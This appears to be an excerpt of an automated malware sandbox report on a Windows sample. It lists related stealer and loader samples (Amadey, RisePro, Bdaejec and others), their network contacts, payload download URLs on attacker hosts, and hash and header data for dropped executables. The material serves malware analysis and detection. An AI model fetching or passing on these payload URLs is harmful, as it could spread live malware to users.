              LisectAVT_2403002B_97.exeGet hashmaliciousBdaejecBrowse
              • ddos.dnsnb8.net:799/cj//k2.rar
              LisectAVT_2403002B_28.exeGet hashmaliciousBdaejecBrowse
              • ddos.dnsnb8.net:799/cj//k1.rar
              LisectAVT_2403002B_351.exeGet hashmaliciousAmadey, BdaejecBrowse
              • ddos.dnsnb8.net:799/cj//k5.rar
              193.233.132.62SecuriteInfo.com.Win32.PWSX-gen.14899.4987.exeGet hashmaliciousAmadey, RisePro StealerBrowse
              • 193.233.132.62:57893/hera/amadka.exe
              SecuriteInfo.com.Win32.PWSX-gen.580.27252.exeGet hashmaliciousAmadey, RisePro StealerBrowse
              • 193.233.132.62:57893/hera/amadka.exe
              SecuriteInfo.com.Win32.PWSX-gen.15960.19323.exeGet hashmaliciousAmadey, RisePro StealerBrowse
              • 193.233.132.62:57893/hera/amadka.exe
              9iz0QM9rMM.exeGet hashmaliciousAmadey, RisePro StealerBrowse
              • 193.233.132.62:57893/hera/amadka.exe
              4fMLTRkOfB.exeGet hashmaliciousAmadey, RisePro StealerBrowse
              • 193.233.132.62:57893/hera/amadka.exe
              q7a5JOlhLZ.exeGet hashmaliciousAmadey, RisePro StealerBrowse
              • 193.233.132.62:57893/hera/amadka.exe
              7jv1U7CgKF.exeGet hashmaliciousAmadey, RisePro StealerBrowse
              • 193.233.132.62:57893/hera/amadka.exe
              file.exeGet hashmaliciousAmadey, RisePro StealerBrowse
              • 193.233.132.62:57893/hera/amadka.exe
              SecuriteInfo.com.Win32.PWSX-gen.10022.32492.exeGet hashmaliciousAmadey, RisePro StealerBrowse
              • 193.233.132.62:57893/hera/amadka.exe
              file.exeGet hashmaliciousAmadey, RisePro StealerBrowse
              • 193.233.132.62:57893/hera/amadka.exe
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              ddos.dnsnb8.netLisect_AVT_24003_G1A_72.exeGet hashmaliciousLummaC, Bdaejec, LummaC StealerBrowse
              • 44.221.84.105
              Lisect_AVT_24003_G1A_5.exeGet hashmaliciousQuasar, BdaejecBrowse
              • 44.221.84.105
              Lisect_AVT_24003_G1A_16.exeGet hashmaliciousBdaejecBrowse
              • 44.221.84.105
              LisectAVT_2403002C_193.exeGet hashmaliciousBdaejec, MetasploitBrowse
              • 44.221.84.105
              LisectAVT_2403002C_196.exeGet hashmaliciousBdaejecBrowse
              • 44.221.84.105
              LisectAVT_2403002B_91.exeGet hashmaliciousBdaejec, DBatLoaderBrowse
              • 44.221.84.105
              LisectAVT_2403002B_492.exeGet hashmaliciousBdaejec, LokibotBrowse
              • 44.221.84.105
              LisectAVT_2403002B_97.exeGet hashmaliciousBdaejecBrowse
              • 44.221.84.105
              LisectAVT_2403002B_28.exeGet hashmaliciousBdaejecBrowse
              • 44.221.84.105
              LisectAVT_2403002B_351.exeGet hashmaliciousAmadey, BdaejecBrowse
              • 44.221.84.105
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              AMAZON-AESUSLisect_AVT_24003_G1A_72.exeGet hashmaliciousLummaC, Bdaejec, LummaC StealerBrowse
              • 44.221.84.105
              Lisect_AVT_24003_G1A_5.exeGet hashmaliciousQuasar, BdaejecBrowse
              • 44.221.84.105
              Lisect_AVT_24003_G1A_16.exeGet hashmaliciousBdaejecBrowse
              • 44.221.84.105
              LisectAVT_2403002C_193.exeGet hashmaliciousBdaejec, MetasploitBrowse
              • 44.221.84.105
              LisectAVT_2403002C_196.exeGet hashmaliciousBdaejecBrowse
              • 44.221.84.105
              LisectAVT_2403002B_91.exeGet hashmaliciousBdaejec, DBatLoaderBrowse
              • 44.221.84.105
              LisectAVT_2403002B_492.exeGet hashmaliciousBdaejec, LokibotBrowse
              • 44.221.84.105
              LisectAVT_2403002B_97.exeGet hashmaliciousBdaejecBrowse
              • 44.221.84.105
              LisectAVT_2403002B_28.exeGet hashmaliciousBdaejecBrowse
              • 44.221.84.105
              LisectAVT_2403002B_351.exeGet hashmaliciousAmadey, BdaejecBrowse
              • 44.221.84.105
              FREE-NET-ASFREEnetEULisectAVT_2403002A_262.exeGet hashmaliciousRisePro StealerBrowse
              • 193.233.132.190
              LisectAVT_2403002A_224.exeGet hashmaliciousRisePro StealerBrowse
              • 193.233.132.74
              hunta[1].exeGet hashmaliciousBdaejec, RisePro StealerBrowse
              • 193.233.132.62
              External Own 4.20.exeGet hashmaliciousPureLog Stealer, RedLine, zgRATBrowse
              • 147.45.47.64
              Aquantia_Setup 2.11.exeGet hashmaliciousPureLog Stealer, RedLine, zgRATBrowse
              • 147.45.47.64
              AdobeUpdaterV131.exeGet hashmaliciousBdaejec, RisePro StealerBrowse
              • 193.233.132.62
              installer.exeGet hashmaliciousLummaC, PureLog Stealer, Xmrig, zgRATBrowse
              • 147.45.47.81
              92.249.48.47-skid.arm7-2024-07-20T09_04_19.elfGet hashmaliciousMirai, MoobotBrowse
              • 147.45.93.156
              conhost.exeGet hashmaliciousXmrigBrowse
              • 147.45.47.81
              http://premium.davidabostic.comGet hashmaliciousUnknownBrowse
              • 147.45.78.74
              No context
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              C:\Users\user\AppData\Local\Temp\MlpxPf.exeLisect_AVT_24003_G1A_70.exeGet hashmaliciousLummaC, Bdaejec, LummaC StealerBrowse
                Lisect_AVT_24003_G1A_72.exeGet hashmaliciousLummaC, Bdaejec, LummaC StealerBrowse
                  Lisect_AVT_24003_G1A_5.exeGet hashmaliciousQuasar, BdaejecBrowse
                    Lisect_AVT_24003_G1A_16.exeGet hashmaliciousBdaejecBrowse
                      LisectAVT_2403002C_193.exeGet hashmaliciousBdaejec, MetasploitBrowse
                        LisectAVT_2403002C_196.exeGet hashmaliciousBdaejecBrowse
                          LisectAVT_2403002B_91.exeGet hashmaliciousBdaejec, DBatLoaderBrowse
                            LisectAVT_2403002B_492.exeGet hashmaliciousBdaejec, LokibotBrowse
                              LisectAVT_2403002B_97.exeGet hashmaliciousBdaejecBrowse
                                LisectAVT_2403002B_28.exeGet hashmaliciousBdaejecBrowse
                                  Process:C:\Users\user\AppData\Local\Temp\MlpxPf.exe
                                  File Type:MS-DOS executable PE32 executable (GUI) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):19456
                                  Entropy (8bit):6.591092709826399
                                  Encrypted:false
                                  SSDEEP:384:1FMS/XZQaD7U8iu4YsAa7ZA0UvH2lsRv21yW7GbAxur6+Y9PffPz:9BQGPL4vzZq2o9W7GsxBbPr
                                  MD5:5771F9EC7FA262D80BC5D5C704620207
                                  SHA1:3FCBA85C07F4CFB3A9169BF6E60FAEB34735B9E5
                                  SHA-256:D5EF5A34293E43CB71C913E24F0D226F08CCBDB201F831B380D9EA4776A93C0F
                                  SHA-512:57D2E92F6ACED0B3ABBBF790AEBEFDB58C685C6F65E9332232F9B62B47BAEA3C7982AD187910710B49837F2CBF093992632EB5F1E81844B1732D7AF007EC7BE7
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: Avira, Detection: 100%
                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                  Reputation:low
                                  Preview:MZ..........................................................@...PE..L....................................0............................................................................................... ..l...........................................................................................................PELIB...............................`....rsrc........ ......................@..@..Y|.uR..P...0...B.................. ...................................................................................j.h"...h....j...(....Hello World!.MyProg........................................................................................................................................................................................................................(...........0...(.......................;.......User32.dll...MessageBoxA................................................................................................dummy.exe.....................TestExport.CallPlz................
                                  Process:C:\Users\user\AppData\Local\Temp\MlpxPf.exe
                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):2389504
                                  Entropy (8bit):6.731346420298797
                                  Encrypted:false
                                  SSDEEP:49152:BGSXoV72tpV9XE8Wwi1aCvYMdRluS/fYw44RxL:V4OEtwiICvYMpf
                                  MD5:8B92ADCAEFC215F8A389597B1F82E80D
                                  SHA1:EB2F7DBA5CC40784A05C11A7DE1DE0C334F2E565
                                  SHA-256:BF834E041AD3680B3DD58B8EBDA9DDB2573292203446969524D677C00EEAC6B2
                                  SHA-512:9EFB135556EFF049B5E6D9646A1F45CF99816371201A9F5F52711F4A730CB4674DC05B323AD1A826550B9828FEB10E3D32D3F43645703A4C27E292B2AF365574
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: Avira, Detection: 100%
                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Ark.Ark.Ark...o.Mrk...h.Jrk...n.^rk...j.Erk.H...Brk.H...nrk.Arj..pk...b.rk...k.@rk.....@rk...i.@rk.RichArk.........................PE..L.....(c.....................~.......p$...........@...........................$...........@.........................p...<............@ ......................P#.....@...p...................P...........@............................................text...e........................... ..`.rdata...^.......`..................@..@.data...`....0......................@....rsrc........@ ....... .............@..@.reloc.......P#......"#.............@..B.....u...P...p$..B...4$............. ...........................................................................................................................................................................................................................................................
                                  Process:C:\Users\user\AppData\Local\Temp\MlpxPf.exe
                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):31744
                                  Entropy (8bit):6.36657394162034
                                  Encrypted:false
                                  SSDEEP:768:uWQ3655Kv1X/qY1MSdFBQGPL4vzZq2o9W7GsxBbPr:uHqaNrFdFmGCq2iW7z
                                  MD5:D4B4C09D60C82C129E44889E8E12470E
                                  SHA1:647951367CE890E9E8C976CB912908433BE04861
                                  SHA-256:0A840889C218D39B70FAEEC8CF7537968D5AC68F51DD5ABCC77DA7EEE76390FF
                                  SHA-512:194C565D6F74A0130F2C7C9B2464FE853998D8C11DD18F1020E1C59693C00E269D38C58610D7B438AF0D4F8B2FA256E943D11466DC0F89BD9C495304100A0DD3
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: Avira, Detection: 100%
                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.6...X...X...X.x.R...X..V...X.x.\...X......X...Y.W.X......X.!.R...X...^...X.Rich..X.................PE..L...pN.d........../......V...@.......p.......0....@.........................................................................$9.......`...............................................................................0...............................text............................... ..`.rdata.......0......................@..@.data...X....@.......(..............@....rsrc........`.......*..............@..@.EpN.uZ..P...p...B...:.............. ...................................................................................................................................................................................................................................................................................................................................
                                  Process:C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe
                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):2447360
                                  Entropy (8bit):7.930391577466747
                                  Encrypted:false
                                  SSDEEP:49152:e8GpcxEHvbuWvpD3pQcVTVx5QBUu/ApBsUIjtpULzhhLAJFhr:eRy0pBFrnu/ApBsUIRaLzv6
                                  MD5:6A672BBDC7865A7518441284D853F8D8
                                  SHA1:BE887B22A197194E90F9A090174F258BDB062562
                                  SHA-256:A3F809A16001F7EDEA3B2C946286C80DB82531A8CD037320FBA6CF8BBCF68284
                                  SHA-512:0E4F83CC50CF975D8CCEE5D61B009E877B9FBC680B64E04A540A92C9601462ADE0182376053FE15D0B8EF1AF89DD46C06B25BAAFD0A597832600C03900AFE5EE
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: Avira, Detection: 100%
                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                  • Antivirus: ReversingLabs, Detection: 95%
                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......C.........L.....L.....L.....H.G...H.....H.....H...R.L.....L.....L...............E.....-........Rich..................PE..L....~.e...............".....,.......p]...........@...........................]...........@.................................T...h....p.............................................................................................................. . .`..........................@....rsrc........p... ..................@....idata ............. ..............@... ..,.........."..............@...xhwtmwwr.....`A......$..............@...tmaftcgf.....0].......$.............@....taggant.0...@].."....$.............@....%.~.u...P...p]..B....%............. ...................................................................................................................................................
                                  Process:C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):26
                                  Entropy (8bit):3.95006375643621
                                  Encrypted:false
                                  SSDEEP:3:ggPYV:rPYV
                                  MD5:187F488E27DB4AF347237FE461A079AD
                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                  Malicious:true
                                  Preview:[ZoneTransfer]....ZoneId=0
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):65536
                                  Entropy (8bit):0.9876943958931901
                                  Encrypted:false
                                  SSDEEP:96:nVFESn0Yb7Zsihn47afzQXIDcQZc6ocEUecw3U/+HbHg/5ksS/YyNl1zWDUMsxzL:V1b7Zy03s/hj8/B9zuiFqZ24IO8E
                                  MD5:E883ACEF662DDDB3C14CAD7E473D1B19
                                  SHA1:1B2DEDED4368E29A7EFA77683AC2BF225C4A0272
                                  SHA-256:552D4327052263F6D51AB7C4A3B7FBAC81D82E16CC460643B2C9EA12DC895C02
                                  SHA-512:A4D66775827E51983EB3715BD21962D5CB67D1EE6058D305056DA1F249889CF96A8A41976798E41C262453791C28BD0D52C66DC8B793B04811A20A0D74690D56
                                  Malicious:false
                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.6.3.4.9.5.9.6.8.6.0.4.7.6.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.6.3.4.9.5.9.7.4.5.4.2.2.7.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.e.6.3.5.1.2.7.-.f.9.9.b.-.4.0.a.5.-.a.7.5.b.-.d.b.a.6.d.1.7.f.f.e.5.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.a.c.d.c.2.a.7.-.1.1.6.8.-.4.1.4.f.-.8.d.4.4.-.d.4.d.0.8.3.3.1.8.2.4.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.M.l.p.x.P.f...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.7.3.0.-.0.0.0.1.-.0.0.1.4.-.d.7.8.1.-.9.1.c.8.3.d.d.e.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.7.6.6.6.f.7.e.2.4.c.5.7.2.2.3.9.2.7.a.a.9.6.e.d.5.5.a.3.6.5.8.0.0.0.0.f.f.f.f.!.0.0.0.0.d.4.e.9.e.f.1.0.d.7.6.8.5.d.4.9.1.5.8.3.c.6.f.a.9.3.a.e.5.d.9.1.0.5.d.8.1.5.b.d.!.M.l.p.x.P.f...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.1.3.
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:Mini DuMP crash report, 15 streams, Thu Jul 25 02:53:17 2024, 0x1205a4 type
                                  Category:dropped
                                  Size (bytes):152298
                                  Entropy (8bit):1.9360486627481648
                                  Encrypted:false
                                  SSDEEP:768:0RxrgB99WoY9nKpELjr7S66Q/KeY3v5EkasiQC145NXM:4xomJLjvF/KeY3v5EkasiQC145NXM
                                  MD5:42EC808E1D1AC2785A83F5DC96C09286
                                  SHA1:4B82315F41CAAE24D52CC2CF104FAA3F5F7EAA81
                                  SHA-256:E1689D7C695B75F44A3703E9A4AFF4D49BF30F6627C76A028A0CBD20DF5237EF
                                  SHA-512:32D819238D69F083A7D5D5A93ABFE74B58E86645E7D369D57B26ACFBE57A518C5907A15A69CEB7C389727E753BEC14CFCBA436725CC3299A4F3F9461C6F134F8
                                  Malicious:false
                                  Preview:MDMP..a..... ..........f............D...............X.......<.... ......T....N..........`.......8...........T............=..............8!..........$#..............................................................................eJ.......#......GenuineIntel............T.......0......f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):8302
                                  Entropy (8bit):3.7013894591118897
                                  Encrypted:false
                                  SSDEEP:192:R6l7wVeJj466d6YnB6UgmfWV0pDT89bcmsfqUm:R6lXJ8646YB6UgmfWfcFf4
                                  MD5:E07ABF1414B9A2758F8429D471A31CB4
                                  SHA1:E075BF48ADB5F3ACCB93A452440AD5A6D8C37659
                                  SHA-256:B1B6D338713DE9AF5096DA78C07FA7FBE0E6A6D21E6CFA7AA7D9E7746E039F87
                                  SHA-512:6D88CC87978F193A1658ABD63E759AC090FDD5B48BFC3A5C9042C5B9B3C0A276F428F1C9A4F5ACFF05E9907395989C1117EC946C4D80910F5CF83244B8CEEB42
                                  Malicious:false
                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.8.4.0.<./.P.i.
                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):4551
                                  Entropy (8bit):4.44569090369217
                                  Encrypted:false
                                  SSDEEP:48:cvIwWl8zsNJg77aI9EtVWpW8VYwYm8M4Js8FYP+q8+jZSgtSXd:uIjfnI7itk7V8JmfZSgtSXd
                                  MD5:C9A8BCD210E32FE4D9DDFD236EC72615
                                  SHA1:61F2C9DCB6D5136665ECE6B6CDB5FDA48CC64053
                                  SHA-256:B28C234709E39DEA54182313B8DE65ADC8F27F17C00FC0F7CC6A301F4C54BA22
                                  SHA-512:3F9504A27FA694C1BA3076B2C0DE7D7430DEEBF01580C5F0A0A96903026717F47114E5ECD04152695206CA37908CD6D68586B8320D8B038052B80F2776CE1021
                                  Malicious:false
                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="425875" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                  Process:C:\Users\user\AppData\Local\Temp\MlpxPf.exe
                                  File Type:ASCII text
                                  Category:dropped
                                  Size (bytes):4
                                  Entropy (8bit):1.5
                                  Encrypted:false
                                  SSDEEP:3:Nv:9
                                  MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                  SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                  SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                  SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                  Malicious:false
                                  Preview:foo.
                                  Process:C:\Users\user\AppData\Local\Temp\MlpxPf.exe
                                  File Type:ASCII text
                                  Category:dropped
                                  Size (bytes):4
                                  Entropy (8bit):1.5
                                  Encrypted:false
                                  SSDEEP:3:Nv:9
                                  MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                  SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                  SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                  SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                  Malicious:false
                                  Preview:foo.
                                  Process:C:\Users\user\AppData\Local\Temp\MlpxPf.exe
                                  File Type:ASCII text
                                  Category:dropped
                                  Size (bytes):4
                                  Entropy (8bit):1.5
                                  Encrypted:false
                                  SSDEEP:3:Nv:9
                                  MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                  SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                  SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                  SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                  Malicious:false
                                  Preview:foo.
                                  Process:C:\Users\user\AppData\Local\Temp\MlpxPf.exe
                                  File Type:ASCII text
                                  Category:dropped
                                  Size (bytes):4
                                  Entropy (8bit):1.5
                                  Encrypted:false
                                  SSDEEP:3:Nv:9
                                  MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                  SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                  SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                  SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                  Malicious:false
                                  Preview:foo.
                                  Process:C:\Users\user\AppData\Local\Temp\MlpxPf.exe
                                  File Type:ASCII text
                                  Category:dropped
                                  Size (bytes):4
                                  Entropy (8bit):1.5
                                  Encrypted:false
                                  SSDEEP:3:Nv:9
                                  MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                  SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                  SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                  SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                  Malicious:false
                                  Preview:foo.
                                  Process:C:\Users\user\AppData\Local\Temp\MlpxPf.exe
                                  File Type:ASCII text
                                  Category:dropped
                                  Size (bytes):4
                                  Entropy (8bit):1.5
                                  Encrypted:false
                                  SSDEEP:3:Nv:9
                                  MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                  SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                  SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                  SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                  Malicious:false
                                  Preview:foo.
                                  Process:C:\Users\user\AppData\Local\Temp\MlpxPf.exe
                                  File Type:ASCII text
                                  Category:dropped
                                  Size (bytes):4
                                  Entropy (8bit):1.5
                                  Encrypted:false
                                  SSDEEP:3:Nv:9
                                  MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                  SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                  SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                  SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                  Malicious:false
                                  Preview:foo.
                                  Process:C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe
                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):2447360
                                  Entropy (8bit):7.930391577466747
                                  Encrypted:false
                                  SSDEEP:49152:e8GpcxEHvbuWvpD3pQcVTVx5QBUu/ApBsUIjtpULzhhLAJFhr:eRy0pBFrnu/ApBsUIRaLzv6
                                  MD5:6A672BBDC7865A7518441284D853F8D8
                                  SHA1:BE887B22A197194E90F9A090174F258BDB062562
                                  SHA-256:A3F809A16001F7EDEA3B2C946286C80DB82531A8CD037320FBA6CF8BBCF68284
                                  SHA-512:0E4F83CC50CF975D8CCEE5D61B009E877B9FBC680B64E04A540A92C9601462ADE0182376053FE15D0B8EF1AF89DD46C06B25BAAFD0A597832600C03900AFE5EE
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: Avira, Detection: 100%
                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                  • Antivirus: ReversingLabs, Detection: 95%
                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......C.........L.....L.....L.....H.G...H.....H.....H...R.L.....L.....L...............E.....-........Rich..................PE..L....~.e...............".....,.......p]...........@...........................]...........@.................................T...h....p.............................................................................................................. . .`..........................@....rsrc........p... ..................@....idata ............. ..............@... ..,.........."..............@...xhwtmwwr.....`A......$..............@...tmaftcgf.....0].......$.............@....taggant.0...@].."....$.............@....%.~.u...P...p]..B....%............. ...................................................................................................................................................
                                  Process:C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):26
                                  Entropy (8bit):3.95006375643621
                                  Encrypted:false
                                  SSDEEP:3:ggPYV:rPYV
                                  MD5:187F488E27DB4AF347237FE461A079AD
                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                  Malicious:true
                                  Preview:[ZoneTransfer]....ZoneId=0
                                  Process:C:\Users\user\AppData\Local\Temp\MlpxPf.exe
                                  File Type:ASCII text
                                  Category:dropped
                                  Size (bytes):4
                                  Entropy (8bit):1.5
                                  Encrypted:false
                                  SSDEEP:3:Nv:9
                                  MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                  SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                  SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                  SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                  Malicious:false
                                  Preview:foo.
                                  Process:C:\Users\user\AppData\Local\Temp\MlpxPf.exe
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):190
                                  Entropy (8bit):4.96413399469641
                                  Encrypted:false
                                  SSDEEP:3:jdKZOCHyg4E2J5xAIAVdJ0diyMD2UCHyg4E2J5xAIAVdJ0di4KReJsjIdKZOCHyS:jdKoCHhJ23fwdJ0dbMD2UCHhJ23fwdJb
                                  MD5:1392C192EAF3372FE008AB695421604D
                                  SHA1:48C771A0899CA4A6E3E0CF2EB72123FEFBC5FB26
